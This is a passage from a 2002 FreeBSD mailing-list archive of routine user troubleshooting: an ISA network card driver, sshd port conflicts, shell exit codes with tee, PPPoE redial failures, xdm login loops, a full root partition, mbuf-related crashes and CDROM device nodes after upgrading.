Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Greetings, I am trying to configure an ISA 16-bit Realtek 8019AS in FreeBSD V4.5R. If someone has already done so, or knows where I can do some Internet reading, please steer me in the right direction. Regards, Justin P. Michel |- J Continuum |- 21071 - 640 River Street |- Thunder Bay, Ontario, Canada |- P7A 8A7 |- (807) 344-9623 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 8:33:29 2002 Delivered-To: freebsd-questions@freebsd.org Received: from dragon.getnet.net (dragon.getnet.net [63.137.32.5]) by hub.freebsd.org (Postfix) with SMTP id B389937B47E for ; Mon, 24 Jun 2002 08:33:19 -0700 (PDT) Received: (qmail 13438 invoked from network); 24 Jun 2002 15:33:19 -0000 Received: from localhost.getnet.net (HELO servie) (127.0.0.1) by 0 with SMTP; 24 Jun 2002 15:33:19 -0000 From: "Eric" To: Subject: sshd error Date: Mon, 24 Jun 2002 08:30:11 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, I get the following error when I boot: "Local package initialization: squidsshd: SSH Secure Shell 3.1.2 (non-commercial version) on i386-portbld-freebsd4.4 June 24 20:20:53 hostname sshd:[245]: FATAL ERROR: creating listenter failed: port 22 probably already in use! sshd[245]: FATAL: creating listener failed: port 22 probably already in use! sshd. Additional TCP options. Monday June 24 20:20:59 MST 2002" [end error mesg] Could someone help me understand what is up here? This all happened at 8:30 am. The time seems to be off, huh? "time" at root returns "syntax error near unexpected token". Not sure if there is a relation between sshd problem and time prob. Is this the right list for this prob? vberic To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 8:46:34 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailhost.hirshfields.com (mailhost.hirshfields.com [63.226.159.37]) by hub.freebsd.org (Postfix) with ESMTP id 69EBA37B410 for ; Mon, 24 Jun 2002 08:46:17 -0700 (PDT) Received: from ultra.hirshfields.com (ultra.hirshfields.com [192.168.195.101]) by mailhost.hirshfields.com (8.11.4/8.11.4) with SMTP id g5OFk1e11338 for ; Mon, 24 Jun 2002 10:46:01 -0500 (CDT) Received: (qmail 3872 invoked from network); 24 Jun 2002 15:45:55 -0000 Received: from spicer.hirshfields.com (HELO hirshfields.com) (192.168.195.244) by ultra.hirshfields.com with SMTP; 24 Jun 2002 15:45:55 -0000 Message-ID: <3D173EB8.2040503@hirshfields.com> Date: Mon, 24 Jun 2002 10:46:00 -0500 From: C Peter Biessener User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 To: FreeBSD Questions Subject: Bourne shell question Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I have a program which may be run interactively or via cron. I want to use one shell wrapper for both instances. <--- fragment ---> if [ $interactive -eq $TRUE ]; then # myprog $interactive_args 2>&1 | tee -a $err_file myprog $interactive_args else myprog $cron_args >>$err_file 2>&1 fi if [ $? -ne 0 ]; then # do error processing . . . fi <--- fragment ---> I want my interactive users to see any errors (so they know if it failed), but ideally I would also like to capture the errors to an error file as well. However, if I use 'tee', then $? gets tee's exit value and not the exit value from myprog. Is there any way to be able to do what I want? Thanks, Peter Biessener To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 9:30: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cisco.com (sword.cisco.com [161.44.208.100]) by hub.freebsd.org (Postfix) with ESMTP id 741E537B401 for ; Mon, 24 Jun 2002 09:29:52 -0700 (PDT) Received: from sjt-u10.cisco.com (sjt-u10.cisco.com [10.85.30.63]) by cisco.com (8.8.5-Cisco.1/8.8.8) with ESMTP id MAA16906 for ; Mon, 24 Jun 2002 12:29:51 -0400 (EDT) Received: (sjt@localhost) by sjt-u10.cisco.com (8.8.5-Cisco.1/CISCO.WS.1.2) id MAA03083 for questions@FreeBSD.ORG; Mon, 24 Jun 2002 12:29:51 -0400 (EDT) Date: Mon, 24 Jun 2002 12:29:51 -0400 From: Steve Tremblett To: questions@FreeBSD.ORG Subject: Re: ppp broken after 4.6 upgrade? Message-ID: <20020624122951.D1551@sjt-u10.cisco.com> References: <20020622101023.A18927@sjt-u10.cisco.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <20020622101023.A18927@sjt-u10.cisco.com>; from sjt@cisco.com on Sat, Jun 22, 2002 at 10:10:23AM -0400 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG anyone? +---- Steve Tremblett wrote: | Upgraded to 4.5-4.6 yesterday - everything works fine except for ppp | and I'm stumped. In the mergemaster phase I kept my ppp.conf as it was | and I was using PPP all afternoon before installing the build. Please | help! :) | | I've included syslog of a failed session as well as my ppp.conf. When | I run "ppp -background pppoe", I see it attempting redials every 10 | seconds or so. Everything still works on my other PC, so I know the | problem is on this end. | | ppp.conf: | | default: | set log Phase Chat LCP IPCP CCP tun command | nat enable yes | nat same_ports yes | nat use_sockets yes | set redial 15 28800 | set reconnect 15 28800 | | pppoe: | set device PPPoE:xl0 | set mru 1492 | set mtu 1492 | set speed sync | enable lqr | set lqrperiod 5 | set cd 5 | set dial | set login | set timeout 0 | set authname xxxxxxxx | set authkey xxxxxxxx | set ifaddr 10.0.0.1/0 10.0.0.2/0 255.255.255.0 0.0.0.0 | add default HISADDR | enable dns | | | syslog (2 redials before I ^Ced it): | | Jun 22 09:39:23 sjt-bsd ppp[169]: Phase: Using interface: tun0 | Jun 22 09:39:23 sjt-bsd ppp[169]: Phase: deflink: Created in closed state | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: default: nat enable yes | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: default: nat same_ports yes | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: default: nat use_sockets yes | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: default: set redial 15 28800 | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: default: set reconnect 15 28800 | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set device PPPoE:xl0 | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set mru 1492 | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set mtu 1492 | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set speed sync | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: enable lqr | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set lqrperiod 5 | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set cd 5 | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set dial | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set login | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set timeout 0 | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set authname xxxxxxx | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set authkey ******** | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set ifaddr 10.0.0.1/0 10.0.0.2/0 255.255.255.0 0.0.0.0 | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: add default HISADDR | Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: enable dns | Jun 22 09:39:23 sjt-bsd ppp[170]: tun0: Phase: PPP Started (background mode). | Jun 22 09:39:23 sjt-bsd ppp[170]: tun0: Phase: bundle: Establish | Jun 22 09:39:23 sjt-bsd ppp[170]: tun0: Phase: deflink: closed -> opening | Jun 22 09:39:23 sjt-bsd ppp[170]: tun0: Phase: deflink: Connected! | Jun 22 09:39:23 sjt-bsd ppp[170]: tun0: Phase: deflink: opening -> dial | Jun 22 09:39:23 sjt-bsd ppp[170]: tun0: Chat: deflink: Dial attempt 1 of 28800 | Jun 22 09:39:23 sjt-bsd ppp[170]: tun0: Phase: deflink: dial -> carrier | Jun 22 09:39:26 sjt-bsd ppp[170]: tun0: Phase: Received NGM_PPPOE_ACNAME (hook "62031129938542-sHù¿¿ËÒ^G^HM-^@â ^H^P0^K^H") | Jun 22 09:39:27 sjt-bsd ppp[170]: tun0: Phase: Received NGM_PPPOE_<11> (hook "M-^T5^H^Hh0^K^H") | Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Phase: deflink: Disconnected! | Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Phase: deflink: carrier -> hangup | Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Phase: deflink: Connect time: 5 secs: 0 octets in, 0 octets out | Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Phase: deflink: : 0 packets in, 0 packets out | Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Phase: total 0 bytes/sec, peak 0 bytes/sec on Sat Jun 22 09:39:23 2002 | Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Phase: deflink: hangup -> opening | Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Phase: deflink: Enter pause (15) for redialing. | Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Chat: Parent notified of redial | Jun 22 09:39:43 sjt-bsd ppp[170]: tun0: Chat: deflink: Redial timer expired. | Jun 22 09:39:43 sjt-bsd ppp[170]: tun0: Phase: deflink: Connected! | Jun 22 09:39:43 sjt-bsd ppp[170]: tun0: Phase: deflink: opening -> dial | Jun 22 09:39:43 sjt-bsd ppp[170]: tun0: Chat: deflink: Dial attempt 2 of 28800 | Jun 22 09:39:43 sjt-bsd ppp[170]: tun0: Phase: deflink: dial -> carrier | Jun 22 09:39:46 sjt-bsd ppp[170]: tun0: Phase: Received NGM_PPPOE_ACNAME (hook "62031129938542-sHù¿¿ËÒ^G^HM-^@â ^H^P0^K^H") | Jun 22 09:39:47 sjt-bsd ppp[170]: tun0: Phase: Received NGM_PPPOE_<11> (hook "M-^Z5^H^Hh0^K^H") | Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Phase: deflink: Disconnected! | Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Phase: deflink: carrier -> hangup | Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Phase: deflink: Connect time: 5 secs: 0 octets in, 0 octets out | Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Phase: deflink: : 0 packets in, 0 packets out | Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Phase: total 0 bytes/sec, peak 0 bytes/sec on Sat Jun 22 09:39:43 2002 | Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Phase: deflink: hangup -> opening | Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Phase: deflink: Enter pause (15) for redialing. | Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Chat: Parent notified of redial | Jun 22 09:39:56 sjt-bsd ppp[169]: tun0: Phase: Parent: Signal 2 | Jun 22 09:39:56 sjt-bsd ppp[170]: tun0: Phase: Caught signal 2, abort connection(s) | Jun 22 09:39:56 sjt-bsd ppp[170]: tun0: Phase: deflink: Disconnected! | Jun 22 09:39:56 sjt-bsd ppp[170]: tun0: Phase: deflink: opening -> closed | Jun 22 09:39:56 sjt-bsd ppp[170]: tun0: Phase: bundle: Dead | Jun 22 09:39:56 sjt-bsd ppp[170]: tun0: Phase: PPP Terminated (normal). | Jun 22 09:39:56 sjt-bsd ppp[169]: tun0: Phase: Parent: Child failed (errdead) | Jun 22 09:39:56 sjt-bsd ppp[170]: tun0: Chat: Parent notified of failure | | -- | Steve Tremblett | | To Unsubscribe: send mail to majordomo@FreeBSD.org | with "unsubscribe freebsd-questions" in the body of the message | +---end quoted text--- -- Steve Tremblett Cisco Systems To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 9:31:22 2002 Delivered-To: freebsd-questions@freebsd.org Received: from tbaytel.net (tbaytel3.tbaytel.net [206.47.150.179]) by hub.freebsd.org (Postfix) with ESMTP id AA60337B400 for ; Mon, 24 Jun 2002 09:31:15 -0700 (PDT) Received: from sol (vickesh01-1376.tbaytel.net [204.50.183.176]) by tbaytel.net (8.11.2/) with SMTP id g5OGV98336198; Mon, 24 Jun 2002 12:31:10 -0400 Message-ID: <00f701c21b9c$d171f5f0$7f0ea8c0@sol> Reply-To: "Justin P. Michel" From: "Justin P. Michel" To: "Matthew Emmerton" , References: <00be01c21b93$d841d250$7f0ea8c0@sol> <011a01c21b98$132dc1e0$1200a8c0@gsicomp.on.ca> Subject: Re: Proper Driver for Network Card: Realtek 8019AS Date: Mon, 24 Jun 2002 12:33:00 -0400 Organization: J Continuum MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Matthew, If I leave the card in PNP mode, do I just use the line: device ed in my kernel? ----- Original Message ----- From: "Matthew Emmerton" To: "Justin P. Michel" Sent: Monday, June 24, 2002 11:59 AM Subject: Re: Proper Driver for Network Card: Realtek 8019AS > The ed driver is what you need to use for cards using the RT8019 chip. > > ----- Original Message ----- > From: "Justin P. Michel" > To: > Sent: Monday, June 24, 2002 11:28 AM > Subject: Proper Driver for Network Card: Realtek 8019AS > > > > Greetings, > > > > I am trying to configure an ISA 16-bit Realtek 8019AS in FreeBSD V4.5R. > > > > If someone has already done so, or knows where I can do some Internet > > reading, please steer me in the right direction. > > > > Regards, > > > > Justin P. Michel > > |- J Continuum > > |- 21071 - 640 River Street > > |- Thunder Bay, Ontario, Canada > > |- P7A 8A7 > > |- (807) 344-9623 > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-questions" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 9:40:26 2002 Delivered-To: freebsd-questions@freebsd.org Received: from tomts25-srv.bellnexxia.net (tomts25.bellnexxia.net [209.226.175.188]) by hub.freebsd.org (Postfix) with ESMTP id CC85637B401 for ; Mon, 24 Jun 2002 09:40:12 -0700 (PDT) Received: from xena.gsicomp.on.ca ([65.95.179.11]) by tomts25-srv.bellnexxia.net (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP id <20020624163955.ZTWX6218.tomts25-srv.bellnexxia.net@xena.gsicomp.on.ca>; Mon, 24 Jun 2002 12:39:55 -0400 Received: from hermes (hermes.gsicomp.on.ca [192.168.0.18]) by xena.gsicomp.on.ca (8.11.3/8.11.3) with SMTP id g5OFQGE29157; Mon, 24 Jun 2002 11:26:16 -0400 (EDT) (envelope-from matt@gsicomp.on.ca) Message-ID: <013c01c21b9d$cbdc67f0$1200a8c0@gsicomp.on.ca> From: "Matthew Emmerton" To: "Justin P. Michel" , References: <00be01c21b93$d841d250$7f0ea8c0@sol> <011a01c21b98$132dc1e0$1200a8c0@gsicomp.on.ca> <00f701c21b9c$d171f5f0$7f0ea8c0@sol> Subject: Re: Proper Driver for Network Card: Realtek 8019AS Date: Mon, 24 Jun 2002 12:40:05 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Yes, I believe that should work. Matt ----- Original Message ----- From: "Justin P. Michel" To: "Matthew Emmerton" ; Sent: Monday, June 24, 2002 12:33 PM Subject: Re: Proper Driver for Network Card: Realtek 8019AS > Matthew, > > If I leave the card in PNP mode, do I just use the line: > > device ed > > in my kernel? > > > > ----- Original Message ----- > From: "Matthew Emmerton" > To: "Justin P. Michel" > Sent: Monday, June 24, 2002 11:59 AM > Subject: Re: Proper Driver for Network Card: Realtek 8019AS > > > > The ed driver is what you need to use for cards using the RT8019 chip. > > > > ----- Original Message ----- > > From: "Justin P. Michel" > > To: > > Sent: Monday, June 24, 2002 11:28 AM > > Subject: Proper Driver for Network Card: Realtek 8019AS > > > > > > > Greetings, > > > > > > I am trying to configure an ISA 16-bit Realtek 8019AS in FreeBSD V4.5R. > > > > > > If someone has already done so, or knows where I can do some Internet > > > reading, please steer me in the right direction. > > > > > > Regards, > > > > > > Justin P. Michel > > > |- J Continuum > > > |- 21071 - 640 River Street > > > |- Thunder Bay, Ontario, Canada > > > |- P7A 8A7 > > > |- (807) 344-9623 > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-questions" in the body of the message > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 9:41:35 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp-send.myrealbox.com (smtp-send.myrealbox.com [192.108.102.143]) by hub.freebsd.org (Postfix) with ESMTP id 4187737B403 for ; Mon, 24 Jun 2002 09:41:29 -0700 (PDT) Received: from jogega jogegabsd@smtp-send.myrealbox.com [216.230.149.138] by smtp-send.myrealbox.com with NetMail SMTP Agent $Revision: 3.9 $ on Novell NetWare; Mon, 24 Jun 2002 10:41:21 -0600 From: "jogegabsd" To: =?iso-8859-9?Q?Mahmut_Kerem_G=FC=E7?= , Subject: RE: XFREE86 Date: Mon, 24 Jun 2002 10:41:27 -0600 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-9" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <001101c219da$cca00800$79fe83d9@mkeremguc> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG >i just installed freebsd for the first time and i cant get to start x and a window manager like gnome. >Im a newbie on this and want your help. >The handbook says in order to start x by typing startx, you have to install wrapper. I dont know how to >install wrapper and couldn't find it. As an alternative it says you can start by xdm. I have configured >the monitor,card etc thing and started xdm. It gives a login windows and when i enter the root login, > >screen disappears and comes back with the same login screen. As i tried by a normal account other than >root , it did the same thing. >Soif i have to install wrapper please tell me or show me the link in handbook or etc. Or please help me >with xdm. What is the error you got? What are are you trying to run? startx? Do you have a configuration file? We all here are glad to help, but we need a little details. HTH Gerardo Amaya >thanks for all you work and help To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 9:50:44 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.navitaire.com (mail.navitaire.com [205.182.62.81]) by hub.freebsd.org (Postfix) with ESMTP id C1FE837B400 for ; Mon, 24 Jun 2002 09:50:39 -0700 (PDT) Received: from exchange.Navitaire.com (exch.navitaire.com [149.122.4.14]) by mail.navitaire.com (Switch-2.1.4/Switch-2.1.0) with ESMTP id g5OGodr25613 for ; Mon, 24 Jun 2002 11:50:39 -0500 (CDT) Received: by exchange.Navitaire.com with Internet Mail Service (5.5.2653.19) id ; Mon, 24 Jun 2002 11:48:41 -0500 Message-ID: From: "Henning, Brian" To: questions@FreeBSD.ORG Subject: root partition Date: Mon, 24 Jun 2002 11:48:32 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello- I keep having a problem with filling up my root partition. I combine / and /var with 150M of space. Is that enough space? I don't copy files to this partition so I don't really know how it would fill up? Should I just create a bigger partition or is there something I am missing here? thanks, brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 9:56:52 2002 Delivered-To: freebsd-questions@freebsd.org Received: from slate.dublin.wbtsystems.com (slate.dublin.wbtsystems.com [193.120.231.12]) by hub.freebsd.org (Postfix) with ESMTP id 9F66437B41A for ; Mon, 24 Jun 2002 09:55:52 -0700 (PDT) Received: from spiral (spiral.dublin.wbtsystems.com [193.120.231.190]) (authenticated bits=0) by slate.dublin.wbtsystems.com (8.12.3/8.12.3) with ESMTP id g5OGtmbi009216; Mon, 24 Jun 2002 17:55:49 +0100 (IST) From: "Barry Byrne" To: "Henning, Brian" , Subject: RE: root partition Date: Mon, 24 Jun 2002 17:55:48 +0100 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Scanned-By: MIMEDefang 2.8 (www dot roaringpenguin dot com slash mimedefang) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Brian: Problem is most likely log files in /var as stuff in / shouldn't change too much. If this is the case, I'd suggest a separate partition for /var might be appropriate. The size will depend on what you are logging and long you want to keep your logfiles. I would suggest rotating logfiles at regular intervals, and archiving if required. newsyslog is useful for this - man newsyslog. Regards, Barry -- Barry Byrne, IT Manager, WBT Systems, Block 2, Harcourt Centre Harcourt Street, Dublin 2, Ireland > -----Original Message----- > From: owner-freebsd-questions@FreeBSD.ORG > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Henning, Brian > Sent: 24 June 2002 17:49 > To: questions@FreeBSD.ORG > Subject: root partition > > > Hello- > I keep having a problem with filling up my root partition. I combine / and > /var with 150M of space. Is that enough space? I don't copy files to this > partition so I don't really know how it would fill up? Should I > just create > a bigger partition or is there something I am missing here? > thanks, > brian > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 9:58: 3 2002 Delivered-To: freebsd-questions@freebsd.org Received: from seth.uct.kiev.ua (out.uct.kiev.ua [193.110.101.145]) by hub.freebsd.org (Postfix) with ESMTP id 4886437B432 for ; Mon, 24 Jun 2002 09:57:07 -0700 (PDT) Received: from gw.uct.kiev.ua (gw.uct.kiev.ua [193.110.100.5]) by seth.uct.kiev.ua (8.12.4/8.12.2) with ESMTP id g5OGumAw075431 for ; Mon, 24 Jun 2002 19:56:48 +0300 (EEST) (envelope-from sig@uct.kiev.ua) Received: from izida (izida.kiev.ua [193.110.100.3]) by gw.uct.kiev.ua (None/8.11.6) with ESMTP id g5OGulJ28924 for ; Mon, 24 Jun 2002 19:56:48 +0300 (EEST) Date: Mon, 24 Jun 2002 19:56:53 +0300 From: sig X-Mailer: The Bat! (v1.60h) Personal Reply-To: sig Organization: UCT X-Priority: 3 (Normal) Message-ID: <18021465385.20020624195653@uct.kiev.ua> To: freebsd-questions@FreeBSD.ORG Subject: minfo output: junk in mbufs. can someone comment this? MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Our server now running with FreeBSD seth.uct.kiev.ua 4.5-RELEASE-p6 FreeBSD 4.5-RELEASE-p6 #0: server acts as gateway for ~200 hosts/ips. The system halts every 2-3 days, without any error reports! We have following active ethernet interfaces on board: xl0-3: flags=8843 mtu 1500 options=3 media: Ethernet autoselect (100baseTX ) status: active Early, when we just set up new 4.1 we had problems with "out of mbufs space", but after increasing NMNCLUSTERS problem gone. But after CVSUP-ing to 4.5 we now stuck with this unpredicted crashes. I read some topics on deja and saw that some other people had same problems. But there was no answer/solutions. ---------------------------- netstat -m 543/1248/80000 mbufs in use (current/peak/max): 542 mbufs allocated to data 1 mbufs allocated to packet headers 541/850/20000 mbuf clusters in use (current/peak/max) 2012 Kbytes allocated to network (3% of mb_map in use) 0 requests for memory denied 0 requests for memory delayed 0 calls to protocol drain routines --------------------------- minfo: mb_map: 2012/60000 K used (3.35%) map start: 0xc173b000, end 0xc51d3000 503/15000 pages used, 8048 mbuf-size slots Checking cluster ref counts Scanning cluster free list... 307 entries Scanning mbuf free list... 703 entries 0xc18f1000: weird data 131331 @ 0x3 (min 0xc18f1014 max 0xc18f1100) 0xc18f1100: weird data 2 @ 0x37 (min 0xc18f1114 max 0xc18f1200) 0xc18f1200: weird data 2 @ 0x0 (min 0xc18f1214 max 0xc18f1300) 0xc18f1300: weird data 0 @ 0x2 (min 0xc18f1314 max 0xc18f1400) 0xc18f1400: weird data 137669068 @ 0x1 (min 0xc18f1414 max 0xc18f1500) 0xc18f1500: weird data 30 @ 0x0 (min 0xc18f1514 max 0xc18f1600) 0xc18f1600: weird data 0 @ 0x10 (min 0xc18f1614 max 0xc18f1700) Checking for unreferenced clusters. Is this a "normal" behavior? Thanks for advance, sig mailto:sig@uct.kiev.ua ICQ #48415849 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10: 0:27 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp-send.myrealbox.com (smtp-send.myrealbox.com [192.108.102.143]) by hub.freebsd.org (Postfix) with ESMTP id 1BCEF37B403 for ; Mon, 24 Jun 2002 10:00:21 -0700 (PDT) Received: from jogega jogegabsd@smtp-send.myrealbox.com [216.230.149.241] by smtp-send.myrealbox.com with NetMail SMTP Agent $Revision: 3.9 $ on Novell NetWare; Mon, 24 Jun 2002 11:00:20 -0600 From: "jogegabsd" To: "Aaron Burke" , "F.Xavier Noria" Cc: "FreeBSD-Questions" Subject: RE: CDROM not working after upgrade Date: Mon, 24 Jun 2002 11:00:26 -0600 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > > > > After upgrading to 4.6-RELEASE the CDROM has changed from /dev/acd0c > > to /dev/acd0a, and sysinstall does not find it, do you know what can > > be happened? How does sysintall looks for the CDROM when > selected in > > the media list? > > Actually, they are the same device, /dev/acd0c is a block device, > and /dev/acd0a is a raw device. > > > > -- fxn > > > > PS: dmesg says "acd0: CDROM at > ata0-slave PIO4" > > in case it is relevant. > > I think that your cdrom is still working. Try putting a data cd in > the drive and type "mount /cdrom". Then cd to /cdrom and you should > see some files. When done, type "umount /cdrom". > Try to mount the cdrom and see if you get a "Device not configured" error. If you got it, you need to do the following "Copy the new MAKEDEV file to your /dev directory and do a MAKEDEV all You are still using the old MAKEDEV! cp /usr/src/etc/MAKEDEV /dev cd /dev sh MAKEDEV all " thanks to Mark Pearce for this solution and sorry I Copy this literaly. HTH Gerardo Amaya To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10: 1: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from host3.visualpresence2000.com (host3.visualpresence2000.com [209.239.53.64]) by hub.freebsd.org (Postfix) with ESMTP id 7111437B406 for ; Mon, 24 Jun 2002 10:00:39 